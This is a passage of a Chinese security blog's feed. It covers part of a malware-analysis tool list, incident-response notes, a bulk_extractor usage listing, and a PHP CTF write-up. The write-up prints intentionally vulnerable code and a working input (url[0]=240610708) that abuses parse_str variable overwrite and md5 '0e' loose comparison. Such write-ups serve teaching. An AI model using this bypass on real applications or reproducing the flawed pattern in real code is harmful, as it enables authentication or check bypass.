流量捕获，带有索引和数据库系统</li><li><a href="http://www.netresec.com/?page=NetworkMiner" target="_blank" rel="external">NetworkMiner</a> - 有免费版本的网络取证分析工具</li><li><a href="http://ngrep.sourceforge.net/" target="_blank" rel="external">ngrep</a> - 像 grep 一样收集网络流量</li><li><a href="https://github.com/mateuszk87/PcapViz" target="_blank" rel="external">PcapViz</a> - 网络拓扑与流量可视化</li><li><a href="http://www.tcpdump.org/" target="_blank" rel="external">Tcpdump</a> - 收集网络流</li><li><a href="http://tcpick.sourceforge.net/" target="_blank" rel="external">tcpick</a> - 从网络流量中重构 TCP 流</li><li><a href="http://tcpxtract.sourceforge.net/" target="_blank" rel="external">tcpxtract</a> - 从网络流量中提取文件</li><li><a href="https://www.wireshark.org/" target="_blank" rel="external">Wireshark</a> - 网络流量分析工具</li></ul><h2 id="内存取证"><a href="#内存取证" class="headerlink" title="内存取证"></a>内存取证</h2><p><em>在内存映像或正在运行的系统中分析恶意软件的工具</em></p><ul><li><a href="https://www.blackbagtech.com/blacklight.html" target="_blank" rel="external">BlackLight</a> - 支持 hiberfil、pagefile 与原始内存分析的 Windows / MacOS 取证客户端</li><li><a href="https://github.com/504ensicsLabs/DAMM" target="_blank" rel="external">DAMM</a> - 基于 Volatility 的内存中恶意软件的差异分析</li><li><a href="https://github.com/JamesHabben/evolve" target="_blank" rel="external">evolve</a> - 用于 Volatility Memory 取证框架的 Web 界面</li><li><a href="http://jessekornblum.livejournal.com/269749.html" target="_blank" rel="external">FindAES</a> - 在内存中寻找 AES 加密密钥</li><li><a href="https://github.com/ytisf/muninn" target="_blank" rel="external">Muninn</a> - 一个使用 Volatility 的自动化分析脚本，可以生成一份可读报告</li><li><a href="http://www.rekall-forensic.com/" target="_blank" rel="external">Rekall</a> - 内存分析框架，2013 年 Volatility 的分支版本</li><li><a href="https://github.com/sketchymoose/TotalRecall" target="_blank" rel="external">TotalRecall</a> - 基于 Volatility 自动执行多恶意样本分析任务的脚本</li><li><a href="https://github.com/aim4r/VolDiff" target="_blank" rel="external">VolDiff</a> - 在恶意软件执行前后，在内存映像中运行 Volatility 并生成对比报告</li><li><a href="https://github.com/volatilityfoundation/volatility" target="_blank" rel="external">Volatility</a> - 先进的内存取证框架</li><li><a href="https://github.com/kevthehermit/VolUtility" target="_blank" rel="external">VolUtility</a> - Volatility 内存分析框架的 Web 接口</li><li><a href="https://msdn.microsoft.com/en-us/windows/hardware/hh852365" target="_blank" rel="external">WinDbg</a> - Windows 系统的实时内存检查和内核调试工具</li></ul><h2 id="Windows平台神器"><a href="#Windows平台神器" class="headerlink" title="Windows平台神器"></a>Windows平台神器</h2><ul><li><a href="https://github.com/OMENScan/AChoir" target="_blank" rel="external">AChoir</a> - 一个用来收集 Windows 实时事件响应脚本集</li><li><a href="https://github.com/williballenthin/python-evt" target="_blank" rel="external">python-evt</a> - 用来解析 Windows 事件日志的 Python 库</li><li><a href="http://www.williballenthin.com/registry/" target="_blank" rel="external">python-registry</a> - 用于解析注册表文件的 Python 库</li><li><a href="https://regripper.wordpress.com/" target="_blank" rel="external">RegRipper</a> (<a href="https://github.com/keydet89/RegRipper2.8" target="_blank" rel="external">GitHub</a>) - 基于插件集的工具</li></ul><h2 id="存储和工作流"><a href="#存储和工作流" class="headerlink" title="存储和工作流"></a>存储和工作流</h2><ul><li><a href="https://github.com/trendmicro/aleph" target="_blank" rel="external">Aleph</a> - 开源恶意软件分析管道系统</li><li><a href="https://crits.github.io/" target="_blank" rel="external">CRITs</a> - 关于威胁、恶意软件的合作研究</li><li><a href="https://github.com/sroberts/malwarehouse" target="_blank" rel="external">Malwarehouse</a> - 存储、标注与搜索恶意软件</li><li><a href="https://github.com/ANSSI-FR/polichombr" target="_blank" rel="external">Polichombr</a> - 一个恶意软件分析平台，旨在帮助分析师逆向恶意软件。</li><li><a href="http://stoq.punchcyber.com/" target="_blank" rel="external">stoQ</a> - 分布式内容分析框架，具有广泛的插件支持</li><li><a href="http://viper.li/" target="_blank" rel="external">Viper</a> - 分析人员的二进制管理和分析框架</li></ul><h2 id="杂项"><a href="#杂项" class="headerlink" title="杂项"></a>杂项</h2><ul><li><a href="https://github.com/LordNoteworthy/al-khaser" target="_blank" rel="external">al-khaser</a> - 一个旨在突出反恶意软件系统的 PoC 恶意软件</li><li><a href="http://www.binar.ly/search" target="_blank" rel="external">Binarly</a> - 海量恶意软件字节的搜索引擎</li><li><a href="https://github.com/Defense-Cyber-Crime-Center/DC3-MWCP" target="_blank" rel="external">DC3-MWCP</a> - 反网络犯罪中心的恶意软件配置解析框架</li><li><a href="https://github.com/misterch0c/malSploitBase" target="_blank" rel="external">MalSploitBase</a> - 包含恶意软件利用的漏洞的数据库</li><li><a href="https://archive.org/details/malwaremuseum" target="_blank" rel="external">Malware Museum</a> - 收集 20 世纪八九十年代流行的恶意软件</li><li><a href="https://github.com/a0rtega/pafish" target="_blank" rel="external">Pafish</a> - Paranoid Fish，与恶意软件家族的行为一致，采用多种技术来检测沙盒和分析环境的演示工具</li><li><a href="https://remnux.org/" target="_blank" rel="external">REMnux</a> - 面向恶意软件逆向工程师和分析人员的 Linux 发行版和 Docker 镜像</li><li><a href="https://santoku-linux.com/" target="_blank" rel="external">Santoku Linux</a> - 移动取证的 Linux 发行版</li></ul><h1 id="资源"><a href="#资源" class="headerlink" title="资源"></a>资源</h1><h2 id="书籍"><a href="#书籍" class="headerlink" title="书籍"></a>书籍</h2><p><em>基础恶意软件分析阅读书单</em></p><ul><li><a href="https://amzn.com/dp/0470613033" target="_blank" rel="external">Malware Analyst’s Cookbook and DVD</a> - 打击恶意代码的工具和技术</li><li><a href="https://amzn.com/dp/1593272901" target="_blank" rel="external">Practical Malware Analysis</a> - 剖析恶意软件的手边书</li><li><a href="https://www.amzn.com/dp/0321240693" target="_blank" rel="external">Real Digital Forensics</a> - 计算机安全与应急响应</li><li><a href="https://amzn.com/dp/1118825098" target="_blank" rel="external">The Art of Memory Forensics</a> - 在 Windows、Linux 和 Mac 系统的内存中检测恶意软件和威胁</li><li><a href="https://amzn.com/dp/1593272898" target="_blank" rel="external">The IDA Pro Book</a> - 世界上最流行的反汇编器的非官方指南</li><li><a href="https://amzn.com/dp/144962636X" target="_blank" rel="external">Real Digital Forensics</a> - 用于移动取证、恶意软件分析的 Linux 发行版</li></ul><h2 id="Twitter"><a href="#Twitter" class="headerlink" title="Twitter"></a>Twitter</h2><p><em>一些相关的 Twitter 账户</em></p><ul><li>Adamb <a href="https://twitter.com/Hexacorn" target="_blank" rel="external">@Hexacorn</a></li><li>Andrew Case <a href="https://twitter.com/attrc" target="_blank" rel="external">@attrc</a></li><li>Binni Shah <a href="https://twitter.com/binitamshah" target="_blank" rel="external">@binitamshah</a></li><li>Claudio <a href="https://twitter.com/botherder" target="_blank" rel="external">@botherder</a></li><li>Dustin Webber <a href="https://twitter.com/mephux" target="_blank" rel="external">@mephux</a></li><li>Glenn <a href="https://twitter.com/hiddenillusion" target="_blank" rel="external">@hiddenillusion</a></li><li>jekil <a href="https://twitter.com/jekil" target="_blank" rel="external">@jekil</a></li><li>Jurriaan Bremer <a href="https://twitter.com/skier_t" target="_blank" rel="external">@skier_t</a></li><li>Lenny Zeltser <a href="https://twitter.com/lennyzeltser" target="_blank" rel="external">@lennyzeltser</a></li><li>Liam Randall <a href="https://twitter.com/hectaman" target="_blank" rel="external">@hectaman</a></li><li>Mark Schloesser <a href="https://twitter.com/repmovsb" target="_blank" rel="external">@repmovsb</a></li><li>Michael Ligh (MHL) <a href="https://twitter.com/iMHLv2" target="_blank" rel="external">@iMHLv2</a></li><li>Monnappa <a href="https://twitter.com/monnappa22" target="_blank" rel="external">@monnappa22</a></li><li>Open Malware <a href="https://twitter.com/OpenMalware" target="_blank" rel="external">@OpenMalware</a></li><li>Richard Bejtlich <a href="https://twitter.com/taosecurity" target="_blank" rel="external">@taosecurity</a></li><li>Volatility <a href="https://twitter.com/volatility" target="_blank" rel="external">@volatility</a></li></ul><h2 id="其它"><a href="#其它" class="headerlink" title="其它"></a>其它</h2><ul><li><a href="https://github.com/kbandla/APTnotes" target="_blank" rel="external">APT Notes</a> - 一个收集 APT 相关文献的合辑</li><li><a href="https://github.com/corkami/pics" target="_blank" rel="external">File Formats posters</a> - 常用文件格式的可视化（包括 PE 与 ELF）</li><li><a href="http://honeynet.org/" target="_blank" rel="external">Honeynet Project</a> - 蜜罐工具、论文和其他资源</li><li><a href="http://www.kernelmode.info/forum/" target="_blank" rel="external">Kernel Mode</a> - 一个致力于恶意软件分析和内核开发的活跃社区</li><li><a href="https://zeltser.com/malicious-software/" target="_blank" rel="external">Malicious Software</a> - Lenny Zeltser 的恶意软件博客和资源</li><li><a href="https://cse.google.com/cse/home?cx=011750002002865445766%3Apc60zx1rliu" target="_blank" rel="external">Malware Analysis Search</a> - <a href="journeyintoir.blogspot.com/">Corey Harrell</a> 自定义的用于恶意软件分析的 Google 搜索</li><li><a href="http://fumalwareanalysis.blogspot.nl/p/malware-analysis-tutorials-reverse.html" target="_blank" rel="external">Malware Analysis Tutorials</a> - 由 Xiang Fu 博士提供的恶意软件分析教程，是一个学习恶意软件分析的重要资源</li><li><a href="http://malware-traffic-analysis.net/" target="_blank" rel="external">Malware Samples and Traffic</a> - 此博客重点介绍与恶意软件感染相关的网络流量</li><li><a href="https://bluesoul.me/practical-malware-analysis-starter-kit/" target="_blank" rel="external">Practical Malware Analysis Starter Kit</a> - 此软件包包含 Practical Malware Analysis 书中引用的大多数软件</li><li><a href="http://windowsir.blogspot.com/p/malware.html" target="_blank" rel="external">WindowsIR: Malware</a> - Harlan Carvey 的恶意软件页面</li><li><a href="https://www.reddit.com/r/csirt_tools/" target="_blank" rel="external">csirt_tools</a> - CSIRT 工具和资源的子版块，讲<a href="https://www.reddit.com/r/csirt_tools/search?q=flair%3A%22Malware%20analysis%22&amp;sort=new&amp;restrict_sr=on" target="_blank" rel="external">恶意软件分析</a>的天才</li><li><a href="https://www.reddit.com/r/Malware" target="_blank" rel="external">Malware</a> - 恶意软件的子版块</li><li><a href="https://www.reddit.com/r/ReverseEngineering" target="_blank" rel="external">ReverseEngineering</a> - 逆向工程子版块，不仅限于恶意软件</li></ul><h1 id="相关清单"><a href="#相关清单" class="headerlink" title="相关清单"></a>相关清单</h1><ul><li><a href="https://github.com/ashishb/android-security-awesome" target="_blank" rel="external">Android Security</a></li><li><a href="https://github.com/paragonie/awesome-appsec" target="_blank" rel="external">AppSec</a></li><li><a href="https://github.com/apsdehal/awesome-ctf" target="_blank" rel="external">CTFs</a></li><li><a href="https://github.com/Cugu/awesome-forensics" target="_blank" rel="external">Forensics</a></li><li><a href="https://github.com/carpedm20/awesome-hacking" target="_blank" rel="external">“Hacking”</a></li><li><a href="https://github.com/paralax/awesome-honeypots" target="_blank" rel="external">Honeypots</a></li><li><a href="https://github.com/hslatman/awesome-industrial-control-system-security" target="_blank" rel="external">Industrial Control System Security</a></li><li><a href="https://github.com/meirwah/awesome-incident-response" target="_blank" rel="external">Incident-Response</a></li><li><a href="https://github.com/onlurking/awesome-infosec" target="_blank" rel="external">Infosec</a></li><li><a href="https://github.com/caesar0301/awesome-pcaptools" target="_blank" rel="external">PCAP Tools</a></li><li><a href="https://github.com/enaqx/awesome-pentest" target="_blank" rel="external">Pentesting</a></li><li><a href="https://github.com/sbilly/awesome-security" target="_blank" rel="external">Security</a></li><li><a href="https://github.com/hslatman/awesome-threat-intelligence" target="_blank" rel="external">Threat Intelligence</a></li></ul><h1 id="贡献"><a href="#贡献" class="headerlink" title="贡献"></a>贡献</h1><p>欢迎提出问题或者 Pull requests！请在提交 Pull request 之前阅读 <a href="https://github.com/sunnyelf/awesome-malware-analysis/blob/master/CONTRIBUTING.md" target="_blank" rel="external">CONTRIBUTING</a>。</p><h1 id="致谢"><a href="#致谢" class="headerlink" title="致谢"></a>致谢</h1><p>这个列表需要感谢如下一些人:</p><ul><li>Lenny Zeltser 和 REMnux 的其他开发者贡献了这个列表中很多工具</li><li>Michail Hale Ligh、Steven Adair、Blake Hartstein 和 Mather Richard 著有 <em>Malware Analyst’s Cookbook</em>，这本书为这个列表的创建提供了很大的灵感</li><li>每一个提交 Pull request 以及提出建议的人</li></ul><p>十分感谢!</p>]]></content>
    
    <summary type="html">
    
      
      
        &lt;p&gt;&lt;img src=&quot;/2017/10/03/超赞的恶意软件分析/0.png&quot; alt=&quot;超赞的恶意软件分析&quot;&gt;&lt;/p&gt;&lt;h1 id=&quot;超赞的恶意软件分析&quot;&gt;&lt;a href=&quot;#超赞的恶意软件分析&quot; class=&quot;headerlink&quot; title=&quot;超赞的恶意软件分析&quot;&gt;&lt;
      
    
    </summary>
    
      <category term="取证分析" scheme="https://hackfun.org/categories/%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90/"/>
    
    
      <category term="awesome" scheme="https://hackfun.org/tags/awesome/"/>
    
      <category term="恶意软件分析" scheme="https://hackfun.org/tags/%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%86%E6%9E%90/"/>
    
  </entry>
  
  <entry>
    <title>应急响应笔记</title>
    <link href="https://hackfun.org/2017/10/03/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E7%AC%94%E8%AE%B0/"/>
    <id>https://hackfun.org/2017/10/03/应急响应笔记/</id>
    <published>2017-10-03T05:43:49.000Z</published>
    <updated>2017-10-03T05:55:24.793Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/2017/10/03/应急响应笔记/0.png" alt="应急响应笔记"></p><h1 id="定义"><a href="#定义" class="headerlink" title="定义"></a>定义</h1><p>应急响应服务是指为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施的服务。例如：系统被入侵、重要信息被窃取、系统拒绝服务、网络流量异常等。</p><h1 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h1><p>采取紧急措施和行动，恢复业务到正常状态；调查安全事件发生的原因，避免同类事件再次发生；在需要司法机关介入时，提供法律认可的数字证据。</p><h1 id="要求"><a href="#要求" class="headerlink" title="要求"></a>要求</h1><p>应急响应是一项需要充分准备并严密组织的工作，开展调查工作的过程中，要避免不正确的步骤或者遗漏重要步骤对系统产生新的影响。这就需要掌握一定的追踪能力、沟通能力的专业安全人员参与。安全厂商常年研究安全技术、实时跟踪安全动态，对分析和解决各类安全事件有成熟的技术手段和丰富的经验，能为其客户提供可靠的技术服务支持。每一次的应急响应客户不仅仅只是需要一个简单的应急和服务的可用性,更重要的是对黑客行为的全面分析,以资产为核心来分析黑客思维,尽可能明白整个事件的前因后果以及后续的安全排查加固等措施。</p><h1 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h1><p>从业务流程方式可以分为调查，评估，抑制，分析，恢复以及报告的流程。</p><h1 id="心得"><a href="#心得" class="headerlink" title="心得"></a>心得</h1><p>1.在开始接触应急业务之前一定要向客户询问详细事件的发生情况，比如事件发生时间（点或段），事件造成的实际破坏，客户的具体需求和要求。<br>2.根据了解情况先做攻击性质预判，迅速找出关键排查点，尽快恢复业务正常化，在实施过程中注意规范操作。</p><p><img src="/2017/10/03/应急响应笔记/1.png" alt="应急响应笔记"></p><p>3.通过对事件的定性以及取证后有选择的先分析重点内容，基本思路：</p><p><img src="/2017/10/03/应急响应笔记/2.png" alt="应急响应笔记"></p><p>4.先定性，在定向，后全量分析，对应排查工具：</p><p><img src="/2017/10/03/应急响应笔记/3.png" alt="应急响应笔记"></p><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="http://www.aokisec.com/archives/80/" target="_blank" rel="external">应急响应小总结</a></p>]]></content>
    
    <summary type="html">
    
      
      
        &lt;p&gt;&lt;img src=&quot;/2017/10/03/应急响应笔记/0.png&quot; alt=&quot;应急响应笔记&quot;&gt;&lt;/p&gt;&lt;h1 id=&quot;定义&quot;&gt;&lt;a href=&quot;#定义&quot; class=&quot;headerlink&quot; title=&quot;定义&quot;&gt;&lt;/a&gt;定义&lt;/h1&gt;&lt;p&gt;应急响应服务是指为了应对各种
      
    
    </summary>
    
      <category term="取证分析" scheme="https://hackfun.org/categories/%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90/"/>
    
    
      <category term="应急响应" scheme="https://hackfun.org/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/"/>
    
  </entry>
  
  <entry>
    <title>PHP CTF tricks parse_str and loose comparison</title>
    <link href="https://hackfun.org/2017/09/29/PHP-CTF-tricks-parse-str-and-loose-comparison/"/>
    <id>https://hackfun.org/2017/09/29/PHP-CTF-tricks-parse-str-and-loose-comparison/</id>
    <published>2017-09-29T15:31:11.000Z</published>
    <updated>2017-10-03T05:57:28.833Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-题目"><a href="#0x00-题目" class="headerlink" title="0x00 题目"></a>0x00 题目</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line">&lt;meta charset=<span class="string">"utf-8"</span>&gt;</div><div class="line"><span class="meta">&lt;?php</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"><span class="keyword">if</span> (<span class="keyword">empty</span>($_GET[<span class="string">'str'</span>])) &#123;</div><div class="line">    show_source(<span class="keyword">__FILE__</span>);</div><div class="line">    <span class="keyword">die</span>();</div><div class="line">&#125;<span class="keyword">else</span>&#123;</div><div class="line">    <span class="keyword">include</span>(<span class="string">'flag.php'</span>);</div><div class="line">    $url = <span class="string">"www.hackfun.org"</span>;</div><div class="line">    $str = $_GET[<span class="string">'str'</span>];</div><div class="line">    @parse_str($str);</div><div class="line">    <span class="keyword">if</span> ($url[<span class="number">0</span>] != <span class="string">'QNKCDZO'</span> &amp;&amp; md5($url[<span class="number">0</span>]) == md5(<span class="string">'QNKCDZO'</span>)) &#123;</div><div class="line">        <span class="keyword">echo</span> $flag;</div><div class="line">    &#125;<span class="keyword">else</span>&#123;</div><div class="line">        <span class="keyword">exit</span>(<span class="string">'Try angain :-)'</span>);</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><h2 id="0x01-解题"><a href="#0x01-解题" class="headerlink" title="0x01 解题"></a>0x01 解题</h2><p>要得到flag首先要使<code>if ($url[0] != &#39;QNKCDZO&#39; &amp;&amp; md5($url[0]) == md5(&#39;QNKCDZO&#39;))</code>成立，也就是<code>$url[0] != &#39;QNKCDZO&#39;</code>和<code>md5($url[0]) == md5(&#39;QNKCDZO&#39;)</code>都成立，如果str正常传入情况下，<code>$url[0]</code>的值是’w’，满足第一个条件<code>$url[0] != &#39;QNKCDZO&#39;</code>，但是不满足<code>md5($url[0]) == md5(&#39;QNKCDZO&#39;)</code>，但是代码中写了<code>@parse_str($str)</code>;，而<a href="http://www.w3school.com.cn/php/func_string_parse_str.asp" target="_blank" rel="external">parse_str()</a>函数会把参数字符串当做php变量解析，也就是如果str传入的是<code>url[0]=hello</code>，那么就会解析成一个数组url，且数组url的第一个值为hello，此时<code>$url[0] != &#39;QNKCDZO&#39;</code>成立，<code>md5($url[0]) == md5(&#39;QNKCDZO&#39;)</code>不成立，但是至少<code>$url[0]</code>的值可控了，仔细研究<code>md5($url[0]) == md5(&#39;QNKCDZO&#39;)</code>，可以发现<code>md5(&#39;QNKCDZO&#39;)</code>的值为字符型的’0e830400451993494058024219903391’，但是根据<a href="http://php.net/manual/zh/language.operators.comparison.php" target="_blank" rel="external">PHP手册</a>的描述：如果比较一个数字和字符串或者比较涉及到数字内容的字符串，则字符串会被转换为数值并且比较按照数值来进行。其中0e是科学计数法，因为涉及到数字内容，所以就会转换为数值，而’0e830400451993494058024219903391’转换为数值也就是0*(10^830400451993494058024219903391) = 0，所以我们只需要使<code>url[0]</code>的MD5值为类似0e开头后面全为数字的字符串就可以让<code>md5($url[0]) == md5(&#39;QNKCDZO&#39;)</code>成立，通过搜索发现很多字符串都满足条件，具体满足条件的列表可看。</p><ul><li><a href="http://blog.csdn.net/kalbertlee/article/details/70213392" target="_blank" rel="external">0e开头MD5 python生成脚本 PHP哈希弱类型比较缺陷</a></li><li><a href="http://www.cnblogs.com/Primzahl/p/6018158.html" target="_blank" rel="external">PHP处理0e开头md5哈希字符串缺陷/bug</a></li></ul><p>我们选取240610708作为<code>url[0]</code>的值，也就是使str传入的值为<code>url[0]=240610708</code>，此时<code>$url[0] != &#39;QNKCDZO&#39;</code>成立，且<code>md5($url[0]) == md5(&#39;QNKCDZO&#39;)</code>也成立：</p><p><img src="/2017/09/29/PHP-CTF-tricks-parse-str-and-loose-comparison/flag.jpg" alt="flag"></p>]]></content>
    
    <summary type="html">
    
      
      
        &lt;h2 id=&quot;0x00-题目&quot;&gt;&lt;a href=&quot;#0x00-题目&quot; class=&quot;headerlink&quot; title=&quot;0x00 题目&quot;&gt;&lt;/a&gt;0x00 题目&lt;/h2&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;g
      
    
    </summary>
    
    
      <category term="PHP CTF tricks" scheme="https://hackfun.org/tags/PHP-CTF-tricks/"/>
    
      <category term="parse_str" scheme="https://hackfun.org/tags/parse-str/"/>
    
      <category term="loose comparison" scheme="https://hackfun.org/tags/loose-comparison/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux取证分析之bulk-extractor</title>
    <link href="https://hackfun.org/2017/09/07/Kali-Linux%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E4%B9%8Bbulk-extractor/"/>
    <id>https://hackfun.org/2017/09/07/Kali-Linux取证分析之bulk-extractor/</id>
    <published>2017-09-07T01:22:00.000Z</published>
    <updated>2017-10-02T19:22:31.964Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>bulk_extractor是从数字证据文件中提取诸如电子邮件地址，信用卡号，URL和其他类型的信息的功能的程序。 它是一个有用的取证调查工具，可以用于许多任务，如恶意软件和入侵调查，身份调查和网络调查，以及图像分析和密码破解。 该程序提供了几个不寻常的功能：</p><pre><code>1.发现其他工具发现不了的信息，如电子邮件地址，URL和信用卡号码，得益于它能处理压缩数据（如ZIP，PDF和GZIP文件）以及不完整或部分损坏的数据。 它可以从压缩数据的片段中提取JPEG文件，办公文档和其他类型的文件 ，还可以自动检测并提取加密的RAR文件。2.根据数据中发现的所有单词构建单词列表，甚至可以是在未分配空间的压缩文件中的数据。 这些单词列表可用于密码破解。3.多线程的; 速度快节约时间4.分析完之后创建直方图，显示电子邮件地址，URL，域名，搜索关键词和其他类型的信息。</code></pre><p>bulk_extractor可以对磁盘映像，文件或文件目录进行分析，并在不分析文件系统或文件系统结构的情况下提取有用的信息。 输入被分割成页面并由一个或多个扫描器处理。 结果存储在特征文件中，可以使用其他自动化工具轻松检查，解析或处理。<br>bulk_extractor还创建了它所发现的特征的直方图。 这样非常有用，因为诸如电子邮件地址和网络搜索关键词的功能往往很常见且重要。<br>除了上述功能之外，bulk_extractor还包括以下功能：</p><pre><code>5.具有浏览特征文件中存储的功能以及启动bulk_extractor扫描的图形用户界面的Bulk Extractor Viewer6.少量用于对特征文件进行额外分析的python程序</code></pre><a id="more"></a><p>来源：<a href="http://digitalcorpora.org/downloads/bulk_extractor/BEUsersManual.pdf" target="_blank" rel="external">http://digitalcorpora.org/downloads/bulk_extractor/BEUsersManual.pdf</a><br><a href="https://github.com/simsong/bulk_extractor/" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/bulk-extractor.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Simson L. Garfinkel</li><li>证书：GPLv2</li></ul><h2 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01 功能"></a>0x01 功能</h2><p>bulk_extractor - 在不解析文件系统的情况下提取信息。<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div></pre></td><td class="code"><pre><div class="line">bulk_extractor version 1.6.0-dev</div><div class="line">用法：bulk_extractor [选项] 文件</div><div class="line">运行bulk_extractor并提取摘要信息并输出到文件</div><div class="line"></div><div class="line">必需参数：</div><div class="line">   imagefile     - 要提取的文件</div><div class="line">或者-R filedir   - 遍历目录下的文件</div><div class="line">                  支持E01文件</div><div class="line">                  支持AFF文件</div><div class="line">   -o outdir     - 指定输出目录，目录不得已存在</div><div class="line">                  bulk_extractor将创建此目录</div><div class="line">选项：</div><div class="line">   -i                 - 信息模式。快速分析随机取样的样本并打印报告</div><div class="line">   -b banner.txt      - 将banner.txt内容添加到每个输出文件的头部</div><div class="line">   -r alert_list.txt  - 包含提醒作业的警报列表的文件</div><div class="line">                       （可以是特征文件或全局列表）</div><div class="line">                       （可以重复）</div><div class="line">   -w stop_list.txt   - 包含功能停止列表的文件（白名单）</div><div class="line">                       （可以是特征文件或全局列表）</div><div class="line">                       （可以重复）</div><div class="line">   -F &lt;rfile&gt;         - 从&lt;rfile&gt;读取正则表达式列表以查找</div><div class="line">   -f &lt;regex&gt;         - 查找出现的&lt;regex&gt;;可能重复。</div><div class="line">                        结果存入find.txt</div><div class="line">   -q nn              - 静默的模式;只输出nn级别的状态报告。默认值0; -1，没有状态输出</div><div class="line">   -s frac [：passes] - 设置随机抽样参数</div><div class="line"></div><div class="line">调整参数：</div><div class="line">   -C NN                            - 指定上下文窗口的大小（默认值为16）</div><div class="line">   -S fr:&lt;name&gt;:window = NN         - 指定录像机到NN的上下文窗口</div><div class="line">   -S fr:&lt;name&gt;:window_before = NN  - 指定之前的上下文窗口到NN为记录器</div><div class="line">   -S fr:&lt;name&gt;:window_after = NN   - 指定后缀到NN后的上下文窗口</div><div class="line">   -G NN                            - 指定页面大小（默认16777216）</div><div class="line">   -g NN                            - 指定余量（默认4194304）</div><div class="line">   -j NN                            - 要运行的分析线程数（默认4）</div><div class="line">   -M nn                            - 设置最大递归深度（默认7）</div><div class="line">   -m &lt;max&gt;                         - 所有数据读取后等待的最大分钟数（默认60）</div><div class="line"></div><div class="line">路径处理模式：</div><div class="line">   -p &lt;path&gt; / f - 以给定的格式打印&lt;path&gt;的值。</div><div class="line">                  格式：r = 源格式; h = 十六进制格式。</div><div class="line">                  指定-p - 进行交互模式</div><div class="line">                  指定-p -http为HTTP模式</div><div class="line"></div><div class="line">并行化：</div><div class="line">   -Y &lt;o1&gt;        - 在o1开始处理（o1可以是1，1K，1M或1G）</div><div class="line">   -Y &lt;o1&gt; - &lt;o2&gt; - 处理o1-o2</div><div class="line">   -A &lt;off&gt;       - 将&lt;off&gt;添加到所有报告的特征偏移</div><div class="line"></div><div class="line">调试：</div><div class="line">   -h     - 打印此消息</div><div class="line">   -H     - 打印扫描仪的详细信息</div><div class="line">   -V     - 打印版本号</div><div class="line">   -z nn  - 从第nn页开始</div><div class="line">   -dN    - 调试模式（参见源代码）</div><div class="line">   -Z     - 